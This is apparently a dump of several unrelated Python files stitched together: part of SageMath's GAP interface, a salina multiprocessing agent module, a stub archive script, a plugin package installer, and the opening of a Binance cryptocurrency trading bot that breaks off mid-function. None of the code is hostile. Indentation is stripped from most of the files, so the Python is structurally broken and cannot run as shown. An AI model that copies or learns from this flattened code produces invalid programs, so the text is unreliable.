if self.is_remote():
self._get_tmpfile()
with io.open(self._local_tmpfile(), "r",
encoding=gap_encoding) as fobj:
help = fobj.read()
if pager:
from IPython.core.page import page
page(help, start=sline)
else:
# Find the n-th line and return from there
idx = -1
while sline:
    idx = help.find('\n', idx + 1)
    if idx == -1:
        # We ran out of lines early somehow; this shouldn't
        # happen (str.find never raises ValueError)
        break
    sline -= 1
return help[idx:]
def set(self, var, value):
"""
Set the variable var to the given value.
EXAMPLES::
sage: gap.set('x', '2')
sage: gap.get('x')
'2'
"""
cmd = ('%s:=%s;;' % (var, value)).replace('\n','')
self._eval_line(cmd, allow_use_file=True)
def get(self, var, use_file=False):
"""
Get the string representation of the variable var.
EXAMPLES::
sage: gap.set('x', '2')
sage: gap.get('x')
'2'
"""
if use_file:
tmp = self._local_tmpfile()
if os.path.exists(tmp):
os.unlink(tmp)
self.eval('PrintTo("%s", %s);'%(tmp,var), strip=False)
with open(tmp) as f:
r = f.read()
r = r.strip().replace("\\\n","")
os.unlink(tmp)
return r
else:
return self.eval('Print(%s);'%var, newlines=False)
def _pre_interact(self):
"""
EXAMPLES::
sage: gap._pre_interact()
sage: gap._post_interact()
"""
self._eval_line(r'\$SAGE.StartInteract();')
def _post_interact(self):
"""
EXAMPLES::
sage: gap._pre_interact()
sage: gap._post_interact()
"""
self._eval_line(r'\$SAGE.StopInteract();')
def _eval_line_using_file(self, line):
i = line.find(':=')
if i != -1:
j = line.find('"')
if j >= 0 and j < i:
i = -1
if i == -1:
line0 = 'Print( %s );'%line.rstrip().rstrip(';')
try: # this is necessary, since Print requires something as input, and some functions (e.g., Read) return nothing.
return Expect._eval_line_using_file(self, line0)
except RuntimeError:
return ''
return Expect._eval_line_using_file(self, line)
def console(self):
"""
Spawn a new GAP command-line session.
EXAMPLES::
sage: gap.console() # not tested
********* GAP, Version 4.5.7 of 14-Dec-2012 (free software, GPL)
* GAP * http://www.gap-system.org
********* Architecture: x86_64-unknown-linux-gnu-gcc-default64
Libs used: gmp, readline
Loading the library and packages ...
Packages: GAPDoc 1.5.1
Try '?help' for help. See also '?copyright' and '?authors'
gap>
"""
gap_console()
def _object_class(self):
"""
Returns the GapElement class.
EXAMPLES::
sage: gap._object_class()
<class 'sage.interfaces.gap.GapElement'>
sage: type(gap(2))
<class 'sage.interfaces.gap.GapElement'>
"""
return GapElement
def _function_element_class(self):
"""
Returns the GapFunctionElement class.
EXAMPLES::
sage: gap._function_element_class()
<class 'sage.interfaces.gap.GapFunctionElement'>
sage: type(gap.SymmetricGroup(4).Order)
<class 'sage.interfaces.gap.GapFunctionElement'>
"""
return GapFunctionElement
@cached_method
def _tab_completion(self):
"""
Return additional tab completion entries
OUTPUT:
List of strings
EXAMPLES::
sage: '{}' in gap._tab_completion()
False
sage: c = gap._tab_completion()
sage: len(c) > 100
True
sage: 'Order' in c
True
"""
names = eval(self.eval('NamesSystemGVars()')) + \
eval(self.eval('NamesUserGVars()'))
return [n for n in names if n[0] in string.ascii_letters]
############
def gap_reset_workspace(max_workspace_size=None, verbose=False):
r"""
Call this to completely reset the GAP workspace, which is used by
default when Sage first starts GAP.
The first time you start GAP from Sage, it saves the startup state
of GAP in a file ``$HOME/.sage/gap/workspace-gap-HASH``, where ``HASH``
is a hash of the directory where Sage is installed.
This is useful, since then subsequent startup of GAP is at least 10
times as fast. Unfortunately, if you install any new code for GAP,
it won't be noticed unless you explicitly load it, e.g., with
gap.load_package("my_package")
The packages sonata, guava, factint, gapdoc, grape, design, toric,
and laguna are loaded in all cases before the workspace is saved,
if they are available.
TESTS:
Check that the race condition from :trac:`14242` has been fixed.
We temporarily need to change the workspace filename. ::
sage: ORIGINAL_WORKSPACE = sage.interfaces.gap.WORKSPACE
sage: sage.interfaces.gap.WORKSPACE = tmp_filename()
sage: from multiprocessing import Process
sage: import time
sage: gap = Gap() # long time (reset GAP session)
sage: P = [Process(target=gap, args=("14242",)) for i in range(4)]
sage: for p in P: # long time, indirect doctest
....: p.start()
....: time.sleep(float(0.2))
sage: for p in P: # long time
....: p.join()
sage: os.unlink(sage.interfaces.gap.WORKSPACE) # long time
sage: sage.interfaces.gap.WORKSPACE = ORIGINAL_WORKSPACE
"""
# Create new workspace with filename WORKSPACE
g = Gap(use_workspace_cache=False, max_workspace_size=None)
g.eval('SetUserPreference("HistoryMaxLines", 30)')
from sage.tests.gap_packages import all_installed_packages
for pkg in all_installed_packages(gap=g):
try:
g.load_package(pkg, verbose=verbose)
except RuntimeError as msg:
if verbose:
print('*** %s' % msg)
# end for
g.save_workspace()
g.quit()
@instancedoc
class GapElement(GapElement_generic):
def __getitem__(self, n):
"""
EXAMPLES::
sage: a = gap([1,2,3])
sage: a[1]
1
"""
self._check_valid()
if not isinstance(n, tuple):
return self.parent().new('%s[%s]'%(self._name, n))
else:
return self.parent().new('%s%s'%(self._name, ''.join(['[%s]'%x for x in n])))
def str(self, use_file=False):
"""
EXAMPLES::
sage: print(gap(2))
2
"""
if use_file:
P = self._check_valid()
return P.get(self.name(), use_file=True)
else:
return repr(self)
def _latex_(self):
r"""
EXAMPLES::
sage: s = gap("[[1,2], [3/4, 5/6]]")
sage: latex(s)
\left(\begin{array}{rr} 1&2\\ 3/4&\frac{5}{6}\\ \end{array}\right)
"""
P = self._check_valid()
try:
s = P.eval('LaTeXObj(%s)'%self.name())
s = s.replace('\\\\','\\').replace('"','')
s = s.replace('%\\n',' ')
return s
except RuntimeError:
return str(self)
@cached_method
def _tab_completion(self):
"""
Return additional tab completion entries
OUTPUT:
List of strings
EXAMPLES::
sage: s5 = gap.SymmetricGroup(5)
sage: 'Centralizer' in s5._tab_completion()
True
"""
P = self.parent()
v = P.eval(r'\$SAGE.OperationsAdmittingFirstArgument(%s)'%self.name())
v = v.replace('Tester(','').replace('Setter(','').replace(')','').replace('\n', '')
v = v.split(',')
v = [ oper.split('"')[1] for oper in v ]
v = [ oper for oper in v if all(ch in string.ascii_letters for ch in oper) ]
return sorted(set(v))
@instancedoc
class GapFunctionElement(FunctionElement):
def _instancedoc_(self):
"""
EXAMPLES::
sage: gap = Gap(env={'LC_CTYPE': 'en_US.UTF-8'})
sage: print(gap(4).SymmetricGroup.__doc__)
<BLANKLINE>
50.1-... SymmetricGroup
<BLANKLINE>
‣ SymmetricGroup( [filt, ]deg ) ─────────────────────────────────── function
...
"""
M = self._obj.parent()
help = M.help(self._name, pager=False)
return help
@instancedoc
class GapFunction(ExpectFunction):
def _instancedoc_(self):
"""
EXAMPLES::
sage: gap = Gap(env={'LC_CTYPE': 'en_US.UTF-8'})
sage: print(gap.SymmetricGroup.__doc__)
<BLANKLINE>
50.1-... SymmetricGroup
<BLANKLINE>
‣ SymmetricGroup( [filt, ]deg ) ─────────────────────────────────── function
...
"""
M = self._parent
help = M.help(self._name, pager=False)
return help
def is_GapElement(x):
"""
Returns True if x is a GapElement.
EXAMPLES::
sage: from sage.interfaces.gap import is_GapElement
sage: is_GapElement(gap(2))
True
sage: is_GapElement(2)
False
"""
return isinstance(x, GapElement)
def gfq_gap_to_sage(x, F):
"""
INPUT:
- ``x`` -- GAP finite field element
- ``F`` -- Sage finite field
OUTPUT: element of ``F``
EXAMPLES::
sage: x = gap('Z(13)')
sage: F = GF(13, 'a')
sage: F(x)
2
sage: F(gap('0*Z(13)'))
0
sage: F = GF(13^2, 'a')
sage: x = gap('Z(13)')
sage: F(x)
2
sage: x = gap('Z(13^2)^3')
sage: F(x)
12*a + 11
sage: F.multiplicative_generator()^3
12*a + 11
TESTS:
Check that :trac:`18048` is fixed::
sage: K.<a> = GF(16)
sage: b = a^2 + a
sage: K(b._gap_())
a^2 + a
AUTHOR:
- David Joyner and William Stein
"""
s = str(x)
if s[:2] == '0*':
return F(0)
i1 = s.index("(")
i2 = s.index(")")
q = eval(s[i1+1:i2].replace('^','**'))
if not F.cardinality().is_power_of(q):
raise ValueError('%r has no subfield of size %r' % (F, q))
if s.find(')^') == -1:
e = 1
else:
e = int(s[i2+2:])
if F.degree() == 1:
g = F(gap.eval('Int(Z(%s))' % q))
elif F.is_conway():
f = (F.cardinality() - 1) // (q - 1)
g = F.multiplicative_generator() ** f
else:
raise ValueError('%r is not prime or defined by a Conway polynomial' % F)
return g**e
def intmod_gap_to_sage(x):
r"""
INPUT:
- x -- Gap integer mod ring element
EXAMPLES::
sage: a = gap(Mod(3, 18)); a
ZmodnZObj( 3, 18 )
sage: b = sage.interfaces.gap.intmod_gap_to_sage(a); b
3
sage: b.parent()
Ring of integers modulo 18
sage: a = gap(Mod(3, 17)); a
Z(17)
sage: b = sage.interfaces.gap.intmod_gap_to_sage(a); b
3
sage: b.parent()
Finite Field of size 17
sage: a = gap(Mod(0, 17)); a
0*Z(17)
sage: b = sage.interfaces.gap.intmod_gap_to_sage(a); b
0
sage: b.parent()
Finite Field of size 17
sage: a = gap(Mod(3, 65537)); a
ZmodpZObj( 3, 65537 )
sage: b = sage.interfaces.gap.intmod_gap_to_sage(a); b
3
sage: b.parent()
Ring of integers modulo 65537
"""
from sage.rings.finite_rings.all import FiniteField
from sage.rings.finite_rings.integer_mod import Mod
from sage.rings.integer import Integer
s = str(x)
m = re.search(r'Z\(([0-9]*)\)', s)
if m:
return gfq_gap_to_sage(x, FiniteField(Integer(m.group(1))))
m = re.match(r'Zmod[np]ZObj\( ([0-9]*), ([0-9]*) \)', s)
if m:
return Mod(Integer(m.group(1)), Integer(m.group(2)))
raise ValueError("Unable to convert Gap element '%s'" % s)
#############
gap = Gap()
def reduce_load_GAP():
"""
Returns the GAP interface object defined in sage.interfaces.gap.
EXAMPLES::
sage: from sage.interfaces.gap import reduce_load_GAP
sage: reduce_load_GAP()
Gap
"""
return gap
def gap_console():
"""
Spawn a new GAP command-line session.
Note that in gap-4.5.7 a workspace cache saved without a command line
cannot be used to restore a gap session with a command line.
EXAMPLES::
sage: gap_console() # not tested
********* GAP, Version 4.5.7 of 14-Dec-2012 (free software, GPL)
* GAP * http://www.gap-system.org
********* Architecture: x86_64-unknown-linux-gnu-gcc-default64
Libs used: gmp, readline
Loading the library and packages ...
Packages: GAPDoc 1.5.1
Try '?help' for help. See also '?copyright' and '?authors'
gap>
TESTS::
sage: import subprocess as sp
sage: from sage.interfaces.gap import gap_command
sage: cmd = 'echo "quit;" | ' + gap_command(use_workspace_cache=False)[0]
sage: gap_startup = sp.check_output(cmd, shell=True, # py2
....: stderr=sp.STDOUT)
sage: gap_startup = sp.check_output(cmd, shell=True, # py3
....: stderr=sp.STDOUT,
....: encoding='latin1')
sage: 'www.gap-system.org' in gap_startup
True
sage: 'Error' not in gap_startup
True
sage: 'sorry' not in gap_startup
True
"""
from sage.repl.rich_output.display_manager import get_display_manager
if not get_display_manager().is_in_terminal():
raise RuntimeError('Can use the console only in the terminal. Try %%gap magics instead.')
cmd, _ = gap_command(use_workspace_cache=False)
cmd += ' ' + os.path.join(SAGE_EXTCODE,'gap','console.g')
os.system(cmd)
|
remote.py
|
#
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
#
import copy
import time
import torch
import torch.multiprocessing as mp
from salina import Agent
from salina.workspace import Workspace, _SplitSharedWorkspace
def f(agent, in_queue, out_queue, seed):
"""The function that is executed in a single process"""
out_queue.put("ok")
running = True
old_workspace = None
print("Seeding remote agent with ", seed)
agent.seed(seed)
while running:
command = in_queue.get()
if command[0] == "go_new_workspace":
_, workspace, kwargs = command
old_workspace = workspace
agent(workspace, **kwargs)
out_queue.put("ok")
elif command[0] == "go_reuse_workspace":
_, _, kwargs = command
agent(old_workspace, **kwargs)
out_queue.put("ok")
elif command[0] == "exit":
out_queue.put("ok")
return
elif command[0] == "eval_mode":
agent.eval()
out_queue.put("ok")
elif command[0] == "train_mode":
agent.train()
out_queue.put("ok")
class RemoteAgent(Agent):
"""It corresponds to an agent that is executed in another process
Args:
Agent ([salina.Agent]): the agent to execute in another process
"""
def __init__(self, agent, name=None):
super().__init__(name=name)
self.agent = agent
self._is_running = False
self.process = None
self.last_workspace = None
self.train_mode = True
def get_by_name(self, n):
if self._name == n:
return [self] + self.agent.get_by_name(n)
else:
return self.agent.get_by_name(n)
def forward(self, **kwargs):
raise NotImplementedError
def _create_process(self):
print("[RemoteAgent] starting process...")
self.i_queue = mp.Queue()
self.o_queue = mp.Queue()
self.i_queue.cancel_join_thread()
self.o_queue.cancel_join_thread()
self.process = mp.Process(
target=f, args=(self.agent, self.i_queue, self.o_queue, self._seed)
)
self.process.daemon = False
self.process.start()
r = self.o_queue.get()
def __call__(self, workspace, **kwargs):
with torch.no_grad():
assert (
workspace.is_shared
), "You must use a shared workspace when using a Remote Agent"
if self.process is None:
self._create_process()
self.train(self.train_mode)
            if workspace != self.last_workspace:
self.i_queue.put(("go_new_workspace", workspace, kwargs))
self.last_workspace = workspace
r = self.o_queue.get()
assert r == "ok"
else:
self.i_queue.put(("go_reuse_workspace", workspace, kwargs))
r = self.o_queue.get()
assert r == "ok"
def _asynchronous_call(self, workspace, **kwargs):
"""Non-blocking forward. To use together with `is_running`"""
with torch.no_grad():
self._is_running = True
assert (
workspace.is_shared
), "You must use a shared workspace when using a Remote Agent"
if self.process is None:
self._create_process()
            if workspace != self.last_workspace:
self.i_queue.put(("go_new_workspace", workspace, kwargs))
self.last_workspace = workspace
else:
self.i_queue.put(("go_reuse_workspace", workspace, kwargs))
def train(self, f=True):
self.train_mode = f
if self.process is None:
return
if f:
self.i_queue.put(("train_mode"))
a = self.o_queue.get()
assert a == "ok"
else:
self.eval()
def eval(self):
self.train_mode = False
if self.process is None:
return
self.i_queue.put(("eval_mode"))
a = self.o_queue.get()
assert a == "ok"
def seed(self, _seed):
self._seed = _seed
def _running_queue(self):
return self.o_queue
def is_running(self):
if self._is_running:
try:
r = self.o_queue.get(False)
assert r == "ok"
self._is_running = False
            except Exception:
                # the worker has not acknowledged completion yet
                pass
return self._is_running
def close(self):
if self.process is None:
return
print("[RemoteAgent] closing process")
self.i_queue.put(("exit",))
self.o_queue.get()
time.sleep(0.1)
self.process.terminate()
self.process.join()
self.i_queue.close()
self.o_queue.close()
time.sleep(0.1)
del self.i_queue
del self.o_queue
self.process = None
def __del__(self):
self.close()
class NRemoteAgent(Agent):
"""Multiple agents executed in different processes. Use the NRemoteAgent.create function to create such an agent"""
def __init__(self, agents, batch_dims):
super().__init__()
self.agents = agents
self.batch_dims = batch_dims
def get_by_name(self, name):
r = []
if self._name == name:
r = [self]
for a in self.agents:
r = r + a.get_by_name(name)
return r
@staticmethod
def create(agent, num_processes=0, time_size=None, **extra_kwargs):
"""Returns a NRemote agent with num_processes copies of agent in different processes
Also returns the specific workspace to use with such an agent
Args:
agent ([salina.Agent]): The agent to execute in multiple processes
num_processes (int, optional): Number of processes to create. If 0, then no processes are created (for debugging). Defaults to 0.
time_size ([type], optional): If specified, it forces the created Workspace to have this particular time_size. Defaults to None.
Returns:
[salina.Agent,salina.SharedWorkspace]: The NRemoteAgent and the corresponding workspace
"""
agent.seed(0)
if num_processes == 0:
workspace = Workspace()
_agent = copy.deepcopy(agent)
agent(workspace, **extra_kwargs)
shared_workspace = workspace._convert_to_shared_workspace(
n_repeat=1, time_size=time_size
)
return _agent, shared_workspace
workspace = Workspace()
agents = [copy.deepcopy(agent) for t in range(num_processes)]
agent(workspace, **extra_kwargs)
b = workspace.batch_size()
batch_dims = [(k * b, k * b + b) for k, a in enumerate(agents)]
shared_workspace = workspace._convert_to_shared_workspace(
n_repeat=num_processes, time_size=time_size
)
agents = [RemoteAgent(a) for a in agents]
return NRemoteAgent(agents, batch_dims), shared_workspace
def __call__(self, workspace, **kwargs):
assert workspace.is_shared
for k in range(len(self.agents)):
_workspace = _SplitSharedWorkspace(workspace, self.batch_dims[k])
self.agents[k]._asynchronous_call(_workspace, **kwargs)
for a in self.agents:
ok = a._running_queue().get()
assert ok == "ok"
def seed(self, seed, inc=1):
s = seed
for a in self.agents:
a.seed(s)
s += inc
def _asynchronous_call(self, workspace, **kwargs):
assert workspace.is_shared
for k in range(len(self.agents)):
_workspace = _SplitSharedWorkspace(workspace, self.batch_dims[k])
self.agents[k]._asynchronous_call(_workspace, **kwargs)
def is_running(self):
for a in self.agents:
if a.is_running():
return True
return False
def train(self, f=True):
for a in self.agents:
a.train(f)
def eval(self):
for a in self.agents:
a.eval()
|
archive.py
|
from . import patients
def archive_cli(args):
if args.by_patient:
return patients.archive_by_patient_cli(args)
raise ValueError("No archive type chosen")
# import lzma
# import multiprocessing
# import pathlib
# import shutil
# import socket
# from datetime import datetime
# MINUTES_OF_DATA = 5
# ICOM_HZ = 4
# SECONDS_OF_DATA = MINUTES_OF_DATA * 60
# BATCH = int(ICOM_HZ * SECONDS_OF_DATA)
# # timestamp = datetime.now().strftime("%Y%m%d_%H%M%S_%f")
# # filename = f"{ip}_{timestamp}"
# # temp_path = live_dir.joinpath(f"{filename}.txt")
# # shutil.move(live_path, temp_path)
# # compressed_path = compressed_dir.joinpath(f"{filename}.xz")
# # multiprocessing.Process(
# # target=compress_and_move_data, args=(temp_path, compressed_path)
# # ).start()
# # multiprocessing.Process(
# # target=compress_and_move_data, args=(live_path, compressed_path)
# # ).start()
# def compress_and_move_data(input_file, output_file):
# input_file = pathlib.Path(input_file)
# output_file = pathlib.Path(output_file)
# with open(input_file, "rb") as in_file:
# with lzma.open(output_file, "w") as out_file:
# out_file.write(in_file.read())
# input_file.unlink()
|
commands.py
|
"""
Some console-friendly methods are exposed in pkg.*, and defined at pkg.commands.
"""
import re
import threading
from .config import g
from .package import LocalPackage
from .repo import Repository
from .vendor import semantic_version
__all__ = ['install', 'remove', 'local', 'remote', 'refresh', 'upgrade']
def _parse_spec(spec):
match = re.match(r"^([a-zA-Z0-9\-][a-zA-Z0-9_\-]{3,214})(.*)$", spec)
name = match.group(1)
version = match.group(2).strip()
# Validate spec by parsing it
version = '*' if not version else version
semantic_version.Spec(version)
return name, version
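
# A quick illustration of what _parse_spec returns, without the
# semantic_version validation step affecting the outcome; the helper below is
# a hypothetical stand-in used only to demonstrate the name/version split.
def _parse_spec_example():
    assert _parse_spec("mypackage") == ("mypackage", "*")          # bare name -> any version
    assert _parse_spec("mypackage==1.2.0") == ("mypackage", "==1.2.0")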
def install(spec, repo=None, upgrade=False):
"""
Download and install a package from specified repository.
See :meth:`install_from_repo`.
:param spec: `name==version`, or just `name` only.
:type spec: str
:param repo: URL of the repository. Default: :code:`g['repos']`
:type repo: list(str) or None
:param upgrade: Upgrade when already installed if True.
"""
name, version = _parse_spec(spec)
def _install_from_repositories(repos):
pkg = remote(name, repos)
if pkg is None:
            raise Exception('Package not found in any repository: %r' % name)
pkg.install(upgrade)
if repo is None:
repo = g['repos']
t = threading.Thread(target=_install_from_repositories, args=(repo,))
t.start()
return t
def remove(name):
"""
Remove a package locally (LocalPackage.remove).
"""
pkg = LocalPackage.by_name(name)
if pkg:
return pkg.remove()
def local(name):
"""
Find an installed package (LocalPackage.by_name).
:returns: None if package is not found, else LocalPackage instance.
:rtype: LocalPackage
"""
return LocalPackage.by_name(name)
def remote(name, repo=None):
"""
Find a remote package from given repos.
:param name: Name of the package
:param repo: URL of the repository. Default: :code:`g['repos']`
:type repo: list(str) or None
:returns: None if package is not found, else InstallablePackage instance.
:rtype: InstallablePackage
"""
if repo is None:
repo = g['repos']
for _repo in repo:
pkg = Repository.from_url(_repo).get(name)
if pkg is None:
continue
else:
return pkg
return None
def refresh():
"""
Rescan and load available plugins.
"""
for pkg in LocalPackage.all():
pkg.load()
return True
def upgrade(spec, repo=None):
"""
Upgrade specified package. (:code:`pkg.install(spec, repo, upgrade=True)`)
:param spec: `name==version`, or just `name` only.
:param repo: target repository to download.
:type spec: str
"""
return install(spec, repo, upgrade=True)
|
Binance Detect Moonings.py
|
"""
Disclaimer
All investment strategies and investments involve risk of loss.
Nothing contained in this program, scripts, code or repository should be
construed as investment advice. Any reference to an investment's past or
potential performance is not, and should not be construed as, a recommendation
or as a guarantee of any specific outcome or profit.
By using this program you accept all liabilities,
and that no claims can be made against the developers,
or others connected with the program.
"""
# use for environment variables
import os
# use if needed to pass args to external modules
import sys
# used to create threads & dynamic loading of modules
import threading
import importlib
# used for directory handling
import glob
# Needed for colorful console output. Install with: python3 -m pip install colorama (Mac/Linux) or pip install colorama (PC)
from colorama import init
init()
# needed for the binance API / websockets / Exception handling
from binance.client import Client
from binance.exceptions import BinanceAPIException
# used for dates
from datetime import date, datetime, timedelta
import time
# used to repeatedly execute the code
from itertools import count
# used to store trades and sell assets
import json
# Load helper modules
from helpers.parameters import (
parse_args, load_config
)
# Load creds modules
from helpers.handle_creds import (
load_correct_creds, test_api_key
)
# for colourful logging to the console
class txcolors:
BUY = '\033[92m'
WARNING = '\033[93m'
SELL_LOSS = '\033[91m'
SELL_PROFIT = '\033[32m'
DIM = '\033[2m\033[35m'
DEFAULT = '\033[39m'
# tracks profit/loss each session
global session_profit
session_profit = 0
# print with timestamps
old_out = sys.stdout
class St_ampe_dOut:
"""Stamped stdout."""
nl = True
def write(self, x):
"""Write function overloaded."""
if x == '\n':
old_out.write(x)
self.nl = True
elif self.nl:
old_out.write(f'{txcolors.DIM}[{str(datetime.now().replace(microsecond=0))}]{txcolors.DEFAULT} {x}')
self.nl = False
else:
old_out.write(x)
def flush(self):
pass
sys.stdout = St_ampe_dOut()
def get_price(add_to_historical=True):
'''Return the current price for all coins on binance'''
global historical_prices, hsp_head
initial_price = {}
prices = client.get_all_tickers()
for coin in prices:
if CUSTOM_LIST:
if any(item + PAIR_WITH == coin['symbol'] for item in tickers) and all(item not in coin['symbol'] for item in FIATS):
initial_price[coin['symbol']] = { 'price': coin['price'], 'time': datetime.now()}
else:
if PAIR_WITH in coin['symbol'] and all(item not in coin['symbol'] for item in FIATS):
initial_price[coin['symbol']] = { 'price': coin['price'], 'time': datetime.now()}
if add_to_historical:
hsp_head += 1
if hsp_head == RECHECK_INTERVAL:
hsp_head = 0
historical_prices[hsp_head] = initial_price
return initial_price
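
# A tiny sketch (not used by the bot) of the cyclical write pointer that
# get_price() advances: the head index is reset to zero when it reaches the
# wrap-around point, which is a modular increment. `window_length` here plays
# the role of RECHECK_INTERVAL above.
def _sketch_advance_head(head, window_length):
    '''e.g. with window_length=3 the head cycles 0, 1, 2, 0, 1, ...'''
    return (head + 1) % window_length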
def wait_for_price():
'''calls the initial price and ensures the correct amount of time has passed
before reading the current price again'''
global historical_prices, hsp_head, volatility_cooloff
volatile_coins = {}
externals = {}
coins_up = 0
coins_down = 0
coins_unchanged = 0
pause_bot()
if historical_prices[hsp_head]['BNB' + PAIR_WITH]['time'] > datetime.now() - timedelta(minutes=float(TIME_DIFFERENCE / RECHECK_INTERVAL)):
# sleep for exactly the amount of time required
time.sleep((timedelta(minutes=float(TIME_DIFFERENCE / RECHECK_INTERVAL)) - (datetime.now() - historical_prices[hsp_head]['BNB' + PAIR_WITH]['time'])).total_seconds())
print(f'Working...Session profit:{session_profit:.2f}% Est:${(QUANTITY * session_profit)/100:.2f}')
    # retrieve latest prices
get_price()
# calculate the difference in prices
for coin in historical_prices[hsp_head]:
# minimum and maximum prices over time period
min_price = min(historical_prices, key = lambda x: float("inf") if x is None else float(x[coin]['price']))
max_price = max(historical_prices, key = lambda x: -1 if x is None else float(x[coin]['price']))
threshold_check = (-1.0 if min_price[coin]['time'] > max_price[coin]['time'] else 1.0) * (float(max_price[coin]['price']) - float(min_price[coin]['price'])) / float(min_price[coin]['price']) * 100
        # each coin with higher gains than our CHANGE_IN_PRICE is added to the volatile_coins dict, provided MAX_COINS has not been reached.
if threshold_check > CHANGE_IN_PRICE:
coins_up +=1
if coin not in volatility_cooloff:
volatility_cooloff[coin] = datetime.now() - timedelta(minutes=TIME_DIFFERENCE)
# only include coin as volatile if it hasn't been picked up in the last TIME_DIFFERENCE minutes already
if datetime.now() >= volatility_cooloff[coin] + timedelta(minutes=TIME_DIFFERENCE):
volatility_cooloff[coin] = datetime.now()
if len(coins_bought) + len(volatile_coins) < MAX_COINS or MAX_COINS == 0:
volatile_coins[coin] = round(threshold_check, 3)
print(f'{coin} has gained {volatile_coins[coin]}% within the last {TIME_DIFFERENCE} minutes, calculating volume in {PAIR_WITH}')
else:
print(f'{txcolors.WARNING}{coin} has gained {round(threshold_check, 3)}% within the last {TIME_DIFFERENCE} minutes, but you are holding max number of coins{txcolors.DEFAULT}')
elif threshold_check < CHANGE_IN_PRICE:
coins_down +=1
else:
coins_unchanged +=1
# Disabled until fix
#print(f'Up: {coins_up} Down: {coins_down} Unchanged: {coins_unchanged}')
# Here goes new code for external signalling
externals = external_signals()
exnumber = 0
for excoin in externals:
if excoin not in volatile_coins and excoin not in coins_bought and (len(coins_bought) + exnumber) < MAX_COINS:
volatile_coins[excoin] = 1
exnumber +=1
print(f'External signal received on {excoin}, calculating volume in {PAIR_WITH}')
return volatile_coins, len(volatile_coins), historical_prices[hsp_head]
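
# An illustrative, standalone version (with no Binance calls) of the rolling
# window comparison done in wait_for_price() above: take the snapshots with
# the lowest and highest recorded price for one coin and report the percentage
# gain between them. `snapshots` mirrors historical_prices: a list of
# {symbol: {'price': str}} dicts, with None entries while the window fills;
# at least one non-None snapshot containing the coin is assumed.
def _sketch_volatility_gain(snapshots, coin):
    min_snap = min(snapshots, key=lambda s: float("inf") if s is None else float(s[coin]['price']))
    max_snap = max(snapshots, key=lambda s: -1 if s is None else float(s[coin]['price']))
    min_p = float(min_snap[coin]['price'])
    max_p = float(max_snap[coin]['price'])
    return round((max_p - min_p) / min_p * 100, 3)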
def external_signals():
external_list = {}
signals = {}
# check directory and load pairs from files into external_list
signals = glob.glob("signals/*.exs")
for filename in signals:
for line in open(filename):
symbol = line.strip()
external_list[symbol] = symbol
try:
os.remove(filename)
except:
if DEBUG: print(f'{txcolors.WARNING}Could not remove external signalling file{txcolors.DEFAULT}')
return external_list
def pause_bot():
    '''Pause the script when external indicators detect a bearish trend in the market'''
global bot_paused, session_profit, hsp_head
# start counting for how long the bot's been paused
start_time = time.perf_counter()
while os.path.isfile("signals/paused.exc"):
if bot_paused == False:
print(f'{txcolors.WARNING}Pausing buying due to change in market conditions, stop loss and take profit will continue to work...{txcolors.DEFAULT}')
bot_paused = True
# Sell function needs to work even while paused
coins_sold = sell_coins()
remove_from_portfolio(coins_sold)
get_price(True)
# pausing here
if hsp_head == 1: print(f'Paused...Session profit:{session_profit:.2f}% Est:${(QUANTITY * session_profit)/100:.2f}')
time.sleep((TIME_DIFFERENCE * 60) / RECHECK_INTERVAL)
else:
# stop counting the pause time
stop_time = time.perf_counter()
time_elapsed = timedelta(seconds=int(stop_time-start_time))
        # resume the bot and set bot_paused to False
if bot_paused == True:
print(f'{txcolors.WARNING}Resuming buying due to change in market conditions, total sleep time: {time_elapsed}{txcolors.DEFAULT}')
bot_paused = False
return
def convert_volume():
    '''Converts the volume given in QUANTITY from USDT to each coin's volume'''
volatile_coins, number_of_coins, last_price = wait_for_price()
lot_size = {}
volume = {}
for coin in volatile_coins:
# Find the correct step size for each coin
# max accuracy for BTC for example is 6 decimal points
# while XRP is only 1
try:
info = client.get_symbol_info(coin)
step_size = info['filters'][2]['stepSize']
lot_size[coin] = step_size.index('1') - 1
if lot_size[coin] < 0:
lot_size[coin] = 0
except:
pass
# calculate the volume in coin from QUANTITY in USDT (default)
volume[coin] = float(QUANTITY / float(last_price[coin]['price']))
# define the volume with the correct step size
if coin not in lot_size:
volume[coin] = float('{:.1f}'.format(volume[coin]))
else:
# if lot size has 0 decimal points, make the volume an integer
if lot_size[coin] == 0:
volume[coin] = int(volume[coin])
else:
volume[coin] = float('{:.{}f}'.format(volume[coin], lot_size[coin]))
return volume, last_price
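
# A standalone sketch of the step-size rounding used in convert_volume():
# Binance's lot-size filter reports a stepSize string such as '0.00100000',
# and the allowed number of decimal places is derived from the position of
# the first '1' in that string. The helper name and default value are
# illustrative only.
def _sketch_round_to_step(quantity, step_size='0.00100000'):
    decimals = step_size.index('1') - 1
    if decimals <= 0:
        # whole-unit lots, e.g. stepSize '1.00000000'
        return int(quantity)
    return float('{:.{}f}'.format(quantity, decimals))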
def buy():
'''Place Buy market orders for each volatile coin found'''
volume, last_price = convert_volume()
orders = {}
for coin in volume:
        # only buy if there are no active trades on the coin
if coin not in coins_bought:
print(f"{txcolors.BUY}Preparing to buy {volume[coin]} {coin}{txcolors.DEFAULT}")
if TEST_MODE:
orders[coin] = [{
'symbol': coin,
'orderId': 0,
'time': datetime.now().timestamp()
}]
# Log trade
if LOG_TRADES:
write_log(f"Buy : {volume[coin]} {coin} - {last_price[coin]['price']}")
continue
# try to create a real order if the test orders did not raise an exception
try:
buy_limit = client.create_order(
symbol = coin,
side = 'BUY',
type = 'MARKET',
quantity = volume[coin]
)
# error handling here in case position cannot be placed
except Exception as e:
print(e)
# run the else block if the position has been placed and return order info
else:
orders[coin] = client.get_all_orders(symbol=coin, limit=1)
# binance sometimes returns an empty list, the code will wait here until binance returns the order
while orders[coin] == []:
print('Binance is being slow in returning the order, calling the API again...')
orders[coin] = client.get_all_orders(symbol=coin, limit=1)
time.sleep(1)
else:
print('Order returned, saving order to file')
# Log trade
if LOG_TRADES:
write_log(f"Buy : {volume[coin]} {coin} - {last_price[coin]['price']}")
else:
print(f'Signal detected, but there is already an active trade on {coin}')
return orders, last_price, volume
def sell_coins():
'''sell coins that have reached the STOP LOSS or TAKE PROFIT threshold'''
global hsp_head, session_profit
last_price = get_price(False) # don't populate rolling window
#last_price = get_price(add_to_historical=True) # don't populate rolling window
coins_sold = {}
for coin in list(coins_bought):
# define stop loss and take profit
TP = float(coins_bought[coin]['bought_at']) + (float(coins_bought[coin]['bought_at']) * coins_bought[coin]['take_profit']) / 100
